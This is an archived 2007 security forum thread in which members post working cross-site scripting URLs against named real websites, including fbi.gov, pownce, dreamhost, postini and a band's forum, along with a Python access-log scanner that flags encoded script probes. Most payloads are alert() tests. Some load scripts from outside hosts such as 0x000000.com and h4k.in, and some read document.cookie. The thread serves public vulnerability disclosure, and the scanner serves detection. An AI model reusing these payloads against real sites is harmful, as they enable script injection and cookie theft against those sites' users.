Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: hackathology
Date: June 26, 2007 04:15AM

Ronald, you mean people from the internet are hitting you?

http://hackathology.blogspot.com

Re: So it begins
Posted by: Anonymous User
Date: June 26, 2007 07:31AM

I guess he meant his site is being probed for XSS, SQLI etc.

Re: So it begins
Posted by: rohanpinto
Date: June 26, 2007 07:52AM

Ronald Wrote:
-------------------------------------------------------
> I'm being hit constantly, but I haven't got holes
> :)

Being hit constantly is another huge issue. I also constantly see incoming SSH connections on my servers... no matter how many IP addresses I add to the denied list, the constant SSH brute force just keeps on going. I wonder if there's a way to prevent that apart from contacting the ISPs and informing them about it.

The sad part about contacting ISPs is that I am really not sure if they do anything about it...

Re: So it begins
Posted by: Martin
Date: June 26, 2007 08:05AM

Brother's gonna work it out....

Stored XSS on The Chemical Brothers' new forum... http://www.thechemicalbrothers.com/forum/

Set profile signature to [img:208f4348a3]../images/chem-logo.png" style="-moz-binding:url(XBL_HERE);[/img:208f4348a3]

Notified them about a month ago. No reply. Love is all.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: So it begins
Posted by: Anonymous User
Date: June 26, 2007 11:48AM

Well, I won't even twitch my eyes when I get hacked on the server level; it's not my job to secure that. I rent the space, so they have to figure that one out. My job is the web app layer and I can sleep well at night, I can tell ya. And what if someone manages to square his eyes through a glowing terminal all month, what has he got? 400+ articles and a bunch of rants which are backed up plenty of times. I switch DNS and am back in 3 hours. As simple as that :)

Re: So it begins
Posted by: Mephisto
Date: June 26, 2007 12:05PM

Security University: Their header says "Are you secure? How do you know?" Another part says "Qualified Training, Qualified Results".

https://www.securityuniversity.net/reg.php?crsNm=%20BUY%20%201%20CEH%20and%20ECSA%20%20get%20FREE%20LPT%20or%20CISSP"><script>alert('XSS');</script>

Re: So it begins
Date: June 26, 2007 05:31PM

Ronald Wrote:
-------------------------------------------------------
> I'm being hit constantly, but I haven't got holes
> :)

I'm always being hit with PHP shell attempts, but they don't work on my site. Yesterday I noticed someone from Amsterdam ran Acunetix against my site, which I didn't appreciate, because if anything it's an annoyance to see all the retarded file names that I don't use show up in my statistics. The only "vulnerabilities" Acunetix finds on my site are TRACE requests, and files that point to missing files (I didn't specify a whole path in some of the links on my error pages).


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: epsteinbar
Date: June 27, 2007 10:58PM

http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('WTF') <-- sorry if this has been posted before; also wasn't sure if this should be under redirect!



Edited 2 time(s). Last edit at 06/27/2007 11:00PM by epsteinbar.

Re: So it begins
Posted by: tx
Date: June 28, 2007 02:34PM

https://tbe.taleo.net/login.jsp?loginErrorMsg=<SCRIPT>alert('XSS');</SCRIPT>
Coupled with the fact that when a user signs up to apply for a job, the site echoes back their chosen password in plaintext, this could be quite dangerous.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 06/28/2007 02:35PM by tx.

Re: So it begins
Posted by: tr1pp33
Date: June 28, 2007 05:33PM

Weather Underground, I think there's loads here

http://www.wunderground.com/wximage/viewsingleimage.html?mode=singleimage&handle=<script>alert("XSS")</script>&number=0



Edited 1 time(s). Last edit at 06/28/2007 05:42PM by tr1pp33.

Re: So it begins
Posted by: Mephisto
Date: June 29, 2007 11:45AM

Oh great... Epsteinbar brought the FBI to the party... now we're all fucked!

Re: So it begins
Posted by: id
Date: June 29, 2007 04:40PM

Not the first time a 3 letter agency has been called out.

-id

Re: So it begins
Posted by: Anonymous User
Date: June 29, 2007 09:37PM

Ode to my old heroes:

http://www.metallica.com/timeline.asp?page=gallery&n_categoryid=2777&year=19882%22%3E%3C/object%3E%3Cscript%20src='http://0x000000.com/x.js'%3E%3C/script%3E

Re: So it begins
Posted by: paroles32
Date: July 03, 2007 05:42AM

More of these:

http://www.paroles32.com/paroles/m.php
http://www.paroles32.com/paroles/n.php
http://www.paroles32.com/paroles/o.php
http://www.paroles32.com/paroles/p.php
http://www.paroles32.com/paroles/q.php
http://www.paroles32.com/paroles/r.php
http://www.paroles32.com/paroles/s.php
http://www.paroles32.com/paroles/t.php
http://www.paroles32.com/paroles/u.php

Song lyrics:
http://www.paroles32.com/paroles/madonna/index.php
http://www.paroles32.com/paroles/wet-wet-wet/index.php

And others are in French, but OK

Re: So it begins
Date: July 03, 2007 09:46AM

wtf?

Re: So it begins
Date: July 03, 2007 10:33AM

Obvious SPAM is obvious.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: EdAbbey
Date: July 03, 2007 08:33PM

http://www.nascio.org/events/calendar.cfm?month=8&year=2007%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C
Seems to be part of a generic ColdFusion error page, which is by itself rather juicy: http://www.nascio.org/events/calendar.cfm?month=8&year=2007x

Re: So it begins
Posted by: digi7al64
Date: July 04, 2007 11:36PM

POWNCE > http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.pownce.com/request_invite/&request_email=%3Cscript%3Ealert%28%27homfg%27%29%3B%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 07/04/2007 11:37PM by digi7al64.

Re: So it begins
Posted by: EdAbbey
Date: July 05, 2007 02:15AM

zooomr: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://beta.zooomr.com/login/&gogogo=1&username=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Re: So it begins
Posted by: EdAbbey
Date: July 07, 2007 02:43PM

http://pownce.com/add_friends/query/%2522%253E%253Cscript%253Ealert%25280%2529%253C%252Fscript%253E/

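The links posted in this thread carry the same script markers raw, percent-encoded once, and percent-encoded twice (the pownce.com `add_friends` link above). As an added example that is not part of any post in the thread, this Python code decodes request targets from access-log lines until they stop changing and reports lines that carry such probes; the log lines, paths and the `MAX_ROUNDS` cap are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Markup that has no business in a request target once it is fully decoded.
MARKERS = re.compile(r"<\s*/?\s*(?:script|iframe|object)\b|javascript:", re.I)
# Client address and request target from a combined-log-style line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
MAX_ROUNDS = 5  # assumed cap on decoding passes per line


def fully_decode(target):
    """Percent-decode until the text stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds


def scan(log_lines):
    """Return (client, marker, decoding_rounds) for each line with a marker."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        text, rounds = fully_decode(m.group(2))
        found = MARKERS.search(text)
        if found:
            hits.append((m.group(1), found.group(0).lower(), rounds))
    return hits


# Constructed sample lines: documentation addresses and made-up paths.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jul/2007:10:55:01 +0000] "GET /login?msg=<SCRIPT>alert(1)</SCRIPT> HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/Jul/2007:10:55:04 +0000] "GET /search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [12/Jul/2007:11:02:10 +0000] "GET /friends/query/%2522%253E%253Cscript%253Ealert%25280%2529%253C%252Fscript%253E/ HTTP/1.1" 200 377',
    '203.0.113.9 - - [12/Jul/2007:11:02:15 +0000] "GET /search.php?q=100%25+cotton HTTP/1.1" 200 512',
    '192.0.2.44 - - [12/Jul/2007:11:30:42 +0000] "GET /calendar.cfm?year=2007%22%3E%3Ciframe%20src=x%20%3C HTTP/1.1" 500 1024',
]

if __name__ == "__main__":
    for client, marker, rounds in scan(SAMPLE_LOG):
        print(f"{client} marker={marker!r} decoding_rounds={rounds}")
```

A decoding-round count of two or more is worth alerting on by itself, since ordinary browsers do not double-encode request targets.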
Re: So it begins
Posted by: 3ric
Date: July 08, 2007 12:54PM

> pownce.com

Here's another one:

PoC: http://p0wnz.website-security.org/poc.swf
AS source: http://p0wnz.website-security.org/poc.as.txt

PoC works if user has an account and uses Flash plugin.

Re: So it begins
Posted by: Anonymous User
Date: July 08, 2007 08:15PM

http://www.filepedia.com/search/results.cfm?hakusanat=%22%3E%3Cscript%20src='http://0x000000.com/x.js'%3E%3C/script%3E%3C%22

Re: So it begins
Posted by: Anonymous User
Date: July 08, 2007 10:13PM

dreamhost 2.0

http://discussion.dreamhost.com/showprofile.pl?Cat=0&User=moua%22%3E%3C/title%3E%3Cscript%3Ealert(document.location);%3C/script%3E%3Ctitle%3E

Some things will never change ^^

Re: So it begins
Posted by: badsamaritan
Date: July 10, 2007 03:15PM

WWW.com The XSS Starts Here

http://www.www.com/search.php?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

Re: So it begins
Posted by: hideaway
Date: July 10, 2007 09:27PM

3ric Wrote:
-------------------------------------------------------
> > pownce.com
>
> Here's another one:
>
> PoC: http://p0wnz.website-security.org/poc.swf

And yet another one in pownce...
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.pownce.com/forgot/&email=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------------------
pen-test blog @ http://www.hideaway.net

Re: So it begins
Posted by: epsteinbar
Date: July 12, 2007 10:55AM

http://www.darknet.org.uk/index.php?s="><script>alert(document.cookie);</script><"
http://www.sitemeter.com/?a=stats&s="><script>alert(document.cookie);</script><"

Re: So it begins
Posted by: christ1an
Date: July 12, 2007 12:10PM

Acquired by Google for $625 million in order to make sure Google's apps are secure in future...

http://www.postini.com/register/index.php?FreeTrial=1&src=%22%3E%3Cscript/src=http://h4k.in/j.js%3E

Regards,
- http://christ1an.blogspot.com

_______________________
[http://php-ids.org] Web Application Security 2.0

Re: So it begins
Posted by: EdAbbey
Date: July 17, 2007 01:28AM

http://govtsecurity.com/searchresults/?terms=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&x=0&y=0

Re: So it begins
Posted by: fogez
Date: July 17, 2007 01:13PM

http://data.aolsearchlogs.com/search/do.cgi?QUERY=XSS%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Ca=%22

Re: So it begins
Posted by: WhiteAcid
Date: July 20, 2007 10:42AM

http://tinyurl.com/2w53ks
That one is for hellboundhackers.org, to test it you need 1) an account, 2) to be logged in and 3) one or more PMs in your inbox.
They have more XSS flaws, but this one was actually interesting.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
